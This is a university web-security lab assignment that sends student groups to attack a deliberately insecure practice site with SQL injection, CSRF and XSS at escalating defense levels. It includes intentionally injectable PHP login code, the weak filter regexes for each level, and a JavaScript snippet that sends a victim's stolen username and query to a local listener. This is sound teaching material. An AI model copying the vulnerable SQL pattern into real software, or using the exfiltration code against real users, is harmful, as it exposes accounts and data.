---
title: "Assignment Five: Web Security (Group Assignment)"
summary:    "This project presents an insecure website that you will attack. You will focus on three common classes of
            vulnerabilities: SQL injection, cross-site request forgery, and cross-site scripting. We will present you
            with several flawed defenses for each of these classes. By exploiting these vulnerabilities, you will
            improve your own understanding of secure web application programming and get a taste of how web security
            analyst may probe a customer's product."

type: "page"

reading_time: false
share: false
profile: false
comments: false
---

This project presents an insecure website that you will attack. You will focus on three common classes of
vulnerabilities: SQL injection, cross-site request forgery, and cross-site scripting. We will present you with several
flawed defenses for each of these classes. By exploiting these vulnerabilities, you will improve your own understanding
of secure web application programming and get a taste of how web security analyst may probe a customer's product. This
is a group assignment and must be done in groups of two or three only. You will complete three parts in this assignment,
and each group member must contribute to all of the parts.

| Assignment Sections                                                                                |
|----------------------------------------------------------------------------------------------------|
| [Part 1: SQL Injection]({{< ref "#part-1-sql-injection" >}})                                       |
| [Part 2: Cross-Site Request Forgery (CSRF)]({{< ref "#part-2-cross-site-request-forgery-csrf" >}}) |
| [Part 3: Cross-Site Scripting (XSS)]({{< ref "#part-3-cross-site-scripting-xss" >}})               |
| [Part 4: Better Defenses Writeup]({{< ref "#part-4-better-defenses-writeup" >}})                   |

### Disclaimer

This project asks you to perform several tasks that would be considered network attacks in many situations. For this
project, you have our permission to target a website that we are providing for this purpose. Attempting the same kinds
of attacks against other websites without authorization is prohibited by law and university policies. You must not
attack any website without explicit permission from an authorized administrator of that website.

The purpose of this assignment is to help you become familiar with three specific vulnerability classes. You may also
notice other security flaws on this site, such as insecure password handling and a lack of HTTPS. Exploiting any
vulnerability that is not directly instructed below is out of scope for this assignment. In particular, exploiting
(either passively or actively) any vulnerability that allows you to view or tamper with another group's work will be
considered academic misconduct in violation of Princeton University's "[Rights, Rules,
Responsibilities](https://rrr.princeton.edu/)."

### Target Website Scenario

You will play the role of a security contractor for a fictitious startup named "**BUNGLE**." This startup is about to
launch its first product -- a search engine -- but their investors are nervous about security problems. Unlike the
bunglers who developed this site, you're studying information security, so the investors have hired you to perform a
security evaluation before it goes live.

A prototype version of the **BUNGLE** search engine is live at [http://bungle.cos432.org](http://bungle.cos432.org/).
The site is written using the Python [Bottle](https://bottlepy.org/docs/dev/) framework. Although this framework has
built-in mechanisms to prevent certain vulnerabilities, the bunglers in charge of performance optimization disabled or
circumvented many of them to "improve the user experience."

In addition to providing search results, the site manages user sessions and search histories. It stores usernames,
passwords, and search history in a MySQL-style database. Your colleagues have determined that the website responds to
the following five paths:

| Page           | Relative Path/URL | Request Type | Details |
|----------------|-------------------|--------------|---------|
| Home Page      | `/`               | `GET`        | The main page displays a search form. When submitted, this search form generates a `GET` request to `/search` with a parameter called `q`. If there is no user attached to the session, then the main page will also display a form that gives the user an option to log into the site or create an account. This form submits a `POST` request to `/login` or `/create`. |
| Search Results | `/search`         | `GET`        | This page will print the search query string and search results for that query in response to a `GET` request with query parameter `q`. If the session has a logged-in user, then the page will display the user's recent search history in a sidebar. This prototype is not connected to the search indexer, so you will not see any real search results. |
| Login Handler  | `/login`          | `POST`       | This handler accepts `POST` requests with two parameters: `username` and `password`. It checks the database to see if a user with those credentials exists. If so, then it sets a login session cookie and redirects the browser back to the home page. The cookie tracks which user is logged into each current session; manipulating or forging this cookie is not part of this project. |
| Logout Handler | `/logout`         | `POST`       | This handler accepts a `POST` request with no parameters. If a login session cookie is set, then it will be deleted/invalidated. The browser is redirected to the home page. |
| Create Account | `/create`         | `POST`       | This handler accepts a `POST` request with two parameters: `username` and `password`. It inserts the credentials into the database, unless the `username` is already present. It then sets a login session cookie for that user and redirects the browser to the home page. |

**Defense Levels:** The bunglers have been experimenting with some primitive defense mechanisms to protect against web
attacks, so you must demonstrate unique attacks against each defense level. The sections below will describe the defense
mechanisms for each part. It is important to note that the defense mechanisms for part two and three are invoked using
drop-down menus at the top of each page. These drop-down menus allow you to change the defense mechanisms to various
levels. The solutions you submit must override these selections by including the extra `csrfdefense=n` and/or
`xssdefense=n` parameters in the target URL, as specified by each of the sections below. *Attempting to subvert the
mechanism for changing defense levels will award no credit for any of the attacks.* Be sure you are testing your
solutions with the correct defense levels!

### Tools and Resources

This assignment depends on more background knowledge than a lecture could teach. Do not be afraid to search online for
basic tutorials on web application technologies or vulnerabilities and exploits, just be sure to respect the
[Collaboration Policy]({{< ref "policies#collaboration-policy" >}}). Here are some examples of tools and resources that may help
you get started:

 - [Firefox Developer Tools](https://developer.mozilla.org/en-US/docs/Tools)
 - [SQL Tutorials](http://sqlzoo.net/wiki/SQL_Tutorial)
 - [SQL Syntax Guide](https://dev.mysql.com/doc/refman/5.6/en/sql-syntax.html)
 - [Intro to HTML](https://developer.mozilla.org/en-US/docs/Web/Guide/HTML/Introduction)
 - [JavaScript 101](https://hsablonniere.github.io/markleft/prezas/javascript-101.html#1.0)
 - [Using jQuery Core](https://learn.jquery.com/using-jquery-core)
 - [jQuery API Docs](https://api.jquery.com/)
 - [Web Technology Made Really Easy](https://www.jmarshall.com/easy/)

One very valuable resource for anyone who touches web programming is the [Open Web Application Security Project
(OWASP)](https://www.owasp.org/index.php/Main_Page). It has many different articles and best practices for both
defending and auditing websites and web applications. The following "cheat sheets" in particular should be useful for
you:

 - [SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)
 - [Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
 - [Cross-Site Scripting Prevention (XSS) Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
 - [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

### Getting Started

Please complete this assignment using the [same VM as the previous assignment]({{< ref "student_vm" >}}) to help
keep your attacks consistent with our solutions/testing environment. Log into the virtual machine, download this
assignment's files to the virtual machine, and proceed to the following parts. You will submit your solutions in a
zipped directory of various text files that are described in each part of the assignment.

## Part 1: SQL Injection

Your first goal is to demonstrate SQL injection attacks that log you into arbitrary user accounts without knowing the
password. In order to protect other students' accounts, you will perform these attacks on a series of separate login
forms outside of the default **BUNGLE** website. For each of the following defenses, exploit a SQL injection
vulnerability that successfully logs you into the user account named "victim". When you are successful, you will see a
page titled "Login successful! (victim)" and it will instruct you as to what should go in your submission file.

### 0. No Defenses

|         |                                                                              |
|---------|------------------------------------------------------------------------------|
| Defense | None                                                                         |
| Target  | [http://bungle.cos432.org/sqlinject0/](http://bungle.cos432.org/sqlinject0/) |
| Submit  | `sql_0.txt` as instructed by the successful login page                       |

### 1. Simple Escaping

|         |                                                                              |
|---------|------------------------------------------------------------------------------|
| Defense | escapes any single quote `'` by replacing it with two single quotes          |
| Target  | [http://bungle.cos432.org/sqlinject1/](http://bungle.cos432.org/sqlinject1/) |
| Submit  | `sql_1.txt` as instructed by the successful login page                       |

### 2. Escaping and Hashing

The server now uses the following PHP code to escape the username and apply the MD5 hash function to the password:

```PHP
if (isset($_POST['username']) and isset($_POST['password'])) {
    $username = mysql_real_escape_string($_POST['username']);
    $password = md5($_POST['password'], true);
    $sql_s = "SELECT * FROM users WHERE username='$username' and pw='$password'";
    
    $rs = mysql_query($sql_s);
    if (mysql_num_rows($rs) > 0) {
        echo "Login successful!";
    } else {
        echo "Incorrect username or password";
    }
}
```

This will be more challenging than the previous two defenses. You need to write a program that generates a working
exploit. You can use any language you like, but pay close attention to the size of your search space and the performance
of your program. Consider using C to avoid unnecessary computational overhead, but focus primarily on reducing the
search space of your program.

|         |                                                                              |
|---------|------------------------------------------------------------------------------|
| Defense | escaping applied to the username and MD5 hashing applied to the password     |
| Target  | [http://bungle.cos432.org/sqlinject2/](http://bungle.cos432.org/sqlinject2/) |
| Submit  | `sql_2.txt` *and* `sql_2_src.zip` (containing source code for your program)  |

### 3. SQL Extra Credit

This defense level is testing a different database configuration. Your job is to use SQL injection to retrieve the
following information:

1. The name of the database.
2. The version of the SQL server.
3. All of the table names in the database.
4. A secret string hidden in the database.

|         |                                                                                                        |
|---------|--------------------------------------------------------------------------------------------------------|
| Defense | new database configuration (extra credit)                                                              |
| Target  | [http://bungle.cos432.org/sqlinject3/](http://bungle.cos432.org/sqlinject3/)                           |
| Submit  | `sql_3.txt` (containing a list of the URLs/queries you tried and the four pieces of information above) |

Example submission file:

```
URL
URL
URL
...
Name: DB name
Version: DB version string
Tables: comma separated names
Secret: secret string
```

### What to submit:

For 1.0, 1.1, and 1.2, when you successfully log in as victim, the server will provide a URL-encoded version of your
form inputs. Submit the appropriate text files with each containing only this line. For 1.2, also submit the source code
for the program you wrote, as a zip file (sql_2_src.zip). For 1.3, submit a text file as specified if you attempt the
extra credit.

## Part 2: Cross-Site Request Forgery (CSRF)

Your next step is to demonstrate CSRF vulnerabilities against the login form. **BUNGLE** has provided two variations of
this implementation for you to test. Your goal is to construct attacks that cause a victim to log into an account *you*
control. This will cause all of the victim's search history to save into an account you can monitor.

For each of the following defenses, create an HTML file that logs a victim into **BUNGLE** with the username `attacker`
and password `l33th4x`. The HTML file should log into the account with no interaction; it should not display any
evidence of an attack (i.e., just a blank page). The next time the victim's browser visits the **BUNGLE** page, it
should say "logged in as attacker."

### 0. No Defenses

|         |                                                             |
|---------|-------------------------------------------------------------|
| Defense | None                                                        |
| Target  | `http://bungle.cos432.org/login?csrfdefense=0&xssdefense=4` |
| Submit  | `csrf_0.html` as instructed above                           |

### 1. Token Validation

The server will now set a cookie named `csrf_token` with a random 16-byte value and include the value as a hidden field
in the login form. When the form is submitted, the server will verify that the client's cookie matches the value in the
form. The [CSRF Prevention Cheat
Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html) will be
very helpful here. You should consider exploring cross-site scripting attacks to help circumvent this defense.

|         |                                                             |
|---------|-------------------------------------------------------------|
| Defense | CSRF token set and included as hidden form field            |
| Target  | `http://bungle.cos432.org/login?csrfdefense=1&xssdefense=0` |
| Submit  | `csrf_1.html` as instructed above                           |

### 2. Token Validation without XSS (Extra Credit)

This is exactly the same as the previous task, but you are no longer allowed to use XSS. This should be impossible
unless there is a mistake in the implementation of the project.

|         |                                                             |
|---------|-------------------------------------------------------------|
| Defense | CSRF token set and included as hidden form field            |
| Target  | `http://bungle.cos432.org/login?csrfdefense=1&xssdefense=4` |
| Submit  | `csrf_2.html` as instructed above                           |

### What to submit:

For each defense level, submit an HTML file with the appropriate name. **Be sure your exploits are targeting the correct
defense levels.** Your code must be self-contained, but you are allowed (and encouraged) to use inline JavaScript
imports for jQuery and jQuery cookies library (i.e., `http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js`
and `https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js`).

Test your solutions by opening them as local files in a new private browser session with the VM web browser and then
browsing to the **BUNGLE** page in a new tab; you should see that the new tab is already logged into the attacker
account.

## Part 3: Cross-Site Scripting (XSS)

Your final goal is to demonstrate XSS attacks against the **BUNGLE** search box, which does not properly filter input
before echoing it to the results page. For each of the defenses below, your goal is to construct a URL that will execute
the payload described below. Your constructed URL should execute the payload when it is pasted into the browser address
bar or clicked as a link. We recommend that you begin testing a simple payload such as `alert(0);` before moving to the
full payload. Note that you should implement the payload once, then encode it in different ways that bypass each of the
different defenses.

The **payload** is simply a program or code-snippet that the attack will execute in a victim's browser. The goal of your
payload is to steal the username and most recent search query of the victim. When a victim clicks on your malicious URL
or pastes it into the browser address bar, the payload will steal the username and the search query from the browser and
send it to the attacker. For this assignment, you can construct the destination for your exfiltration using javascript
code similar to this snippet:

```javascript
var username = "victim_username"                // replace these lines with the actual
var last_query = "victim's last search query"   // values you have stolen from the victim

var url = encodeURI(`http://localhost:31337/stolen?user=${username}&last_search=${last_query}`)
```

You can use this {{% staticLink "scripts/log_listener.py" "log_listener.py" %}}`log_listener`{{% /staticLink %}} python
script to test your exploit. In a terminal window, find the `log_listener.py` file you just downloaded then run `python
log_listener.py`. When your exploit work successfully, you will see the username and search query reported in the
terminal window.

There are five levels of defense for this part of the assignment. In each case, you must submit the simplest attack that
you can find. Each defense level must have a different solution in your submission for full credit. Each text file you
submit should have only the malicious URL that will execute your exploit.

### 0. No Defenses

|         |                                                                                                              |
|---------|--------------------------------------------------------------------------------------------------------------|
| Defense | None                                                                                                         |
| Target  | `http://bungle.cos432.org/search?xssdefense=0`                                                               |
| Submit  | `xss_0.txt` as instructed above *and* `xss_payload.html` containing a human-readable version of your payload |

### 1. Remove "`script`"

|         |                                                |
|---------|------------------------------------------------|
| Defense | <code>&#102;&#105;&#108;&#116;&#101;&#114;&#101;&#100;&#32;&#61;&#32;&#114;&#101;&#46;&#115;&#117;&#98;&#40;&#114;&quot;&#40;&#63;&#105;&#41;&#115;&#99;&#114;&#105;&#112;&#116;&quot;&#44;&#32;&quot;&quot;&#44;&#32;&#105;&#110;&#112;&#117;&#116;&#41;</code>  |
| Target  | `http://bungle.cos432.org/search?xssdefense=1` |
| Submit  | `xss_1.txt` as instructed above                |

### 2. Remove Several Tags

|         |                                                                                     |
|---------|-------------------------------------------------------------------------------------|
| Defense | <code>&#102;&#105;&#108;&#116;&#101;&#114;&#101;&#100;&#32;&#61;&#32;&#114;&#101;&#46;&#115;&#117;&#98;&#40;&#114;&quot;&#40;&#63;&#105;&#41;&#115;&#99;&#114;&#105;&#112;&#116;&#124;&lt;&#105;&#109;&#103;&#124;&lt;&#98;&#111;&#100;&#121;&#124;&lt;&#115;&#116;&#121;&#108;&#101;&#124;&lt;&#109;&#101;&#116;&#97;&#124;&lt;&#101;&#109;&#98;&#101;&#100;&#124;&lt;&#111;&#98;&#106;&#101;&#99;&#116;&quot;&#44;&quot;&quot;&#44;&#32;&#105;&#110;&#112;&#117;&#116;&#41;</code> |
| Target  | `http://bungle.cos432.org/search?xssdefense=2`                                      |
| Submit  | `xss_2.txt` as instructed above                                                     |

### 3. Remove Some Punctuation

|         |                                                |
|---------|------------------------------------------------|
| Defense | <code>&#102;&#105;&#108;&#116;&#101;&#114;&#101;&#100;&#32;&#61;&#32;&#114;&#101;&#46;&#115;&#117;&#98;&#40;&#114;&quot;&#91;&#59;&#39;&#92;&quot;&#93;&quot;&#44;&#32;&quot;&quot;&#44;&#32;&#105;&#110;&#112;&#117;&#116;&#41;</code>      |
| Target  | `http://bungle.cos432.org/search?xssdefense=3` |
| Submit  | `xss_3.txt` as instructed above                |

### 4. Encode `<` and `>` (Extra Credit)

This should be impossible unless there is a mistake in the implementation of the project.

|         |                                                              |
|---------|--------------------------------------------------------------|
| Defense | <code>&#102;&#105;&#108;&#116;&#101;&#114;&#101;&#100;&#32;&#61;&#32;&#105;&#110;&#112;&#117;&#116;&#46;&#114;&#101;&#112;&#108;&#97;&#99;&#101;&#40;&quot;&lt;&quot;&#44;&#32;&quot;&amp;&#108;&#116;&#59;&quot;&#41;&#46;&#114;&#101;&#112;&#108;&#97;&#99;&#101;&#40;&quot;&gt;&quot;&#44;&#32;&quot;&amp;&#103;&#116;&#59;&quot;&#41;</code> |
| Target  | `http://bungle.cos432.org/search?xssdefense=4`               |
| Submit  | `xss_4.txt` as instructed above                              |

### What to submit:

Your submission for each level of defense will be a text file with the appropriate filename and containing a single URL.
When the URL is loaded into the victim's browser, your payload should execute as described above. Your code must be
self-contained, but you are allowed (and encouraged) to use inline JavaScript imports for jQuery and jQuery cookies
library (i.e., `http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js` and
`https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js`).

## Part 4: Better Defenses Writeup

For each of the three classes of vulnerability (SQL injection, CSRF, and XSS), write a short paragraph of advice that
describes the best practices for defending against these attacks. Be sure to understand what the current state of the
art defenses are and describe them in just enough detail to demonstrate that. You will submit this in
`part4/writeup.txt`.

## Submission Requirements

You will submit all of your files in the same structure as the assignment files you downloaded. Please zip the directory
and upload it to [Gradescope](https://www.gradescope.com) with this directory structure:

* `part1/`
    - `sql_0.txt` - 1.0 No Defenses
    - `sql_1.txt` - 1.1 Simple Escaping
    - `sql_2.txt` - 1.2 Escaping and Hashing
    - `sql_2_src.zip` - Source code for 1.2 Escaping and Hashing
    - `sql_3.txt` - 1.3 SQL Extra Credit
* `part2/`
    - `csrf_0.html` - 2.0 No Defenses
    - `csrf_1.html` - 2.1 Token Validation
    - `csrf_2.html` - 2.2 Token Validation (Extra Credit)
* `part3/`
    - `xss_payload.html` - Human-readable payload script
    - `xss_0.txt` - 3.0 No Defenses
    - `xss_1.txt` - 3.1 Remove `script`
    - `xss_2.txt` - 3.2 Remove Several Tags
    - `xss_3.txt` - 3.3 Remove Some Punctuation
    - `xss_4.txt` - 3.4 Encode `<` and `>` (Extra Credit)
* `part4/`
    - `writeup.txt` - Better Defenses Writeup
